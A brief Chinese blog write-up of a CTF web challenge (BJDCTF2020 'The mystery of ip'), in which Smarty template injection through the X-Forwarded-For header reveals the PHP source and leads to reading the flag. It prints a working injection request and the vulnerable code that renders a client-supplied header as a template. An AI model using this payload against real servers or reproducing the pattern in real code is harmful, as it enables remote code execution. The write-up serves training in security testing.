web | [BJDCTF2020]The mystery of ip

跟ip相关,联想到xff注入,试了一下发现没用,再试ssti,成功。

php的模板注入,使用的是smarty模板。
poc:

GET /flag.php HTTP/1.1
Host: node4.buuoj.cn:28612
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://node4.buuoj.cn:28612/hint.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: {{phpinfo()}}

读到源码:

    <?php
    	require_once('header.php');
		require_once('./libs/Smarty.class.php');
		$smarty = new Smarty();
		if (!empty($_SERVER['HTTP_CLIENT_IP'])) 
		{
		    $ip=$_SERVER['HTTP_CLIENT_IP'];
		}
		elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
		{
		    $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
		}
		else
		{
		    $ip=$_SERVER['REMOTE_ADDR'];
		}
		//$your_ip = $smarty->display("string:".$ip);
		echo "<div class=\"container panel1\">
					<div class=\"row\">
					<div class=\"col-md-4\">	
					</div>
					<div class=\"col-md-4\">
					<div class=\"jumbotron pan\">
						<div class=\"form-group log\">
							<label><h2>Your IP is : ";
		$smarty->display("string:".$ip);
		echo "				</h2></label>
						</div>		
					</div>
					</div>
					<div class=\"col-md-4\">	
					</div>
					</div>
				</div>";
	?>

	</body>
</html></html>				</h2></label>
						</div>		
					</div>
					</div>
					<div class="col-md-4">	
					</div>
					</div>
				</div>
	</body>
</html>

直接cat /flag
over.

posted @ 2021-08-03 17:27  Mz1  阅读(75)  评论(0编辑  收藏  举报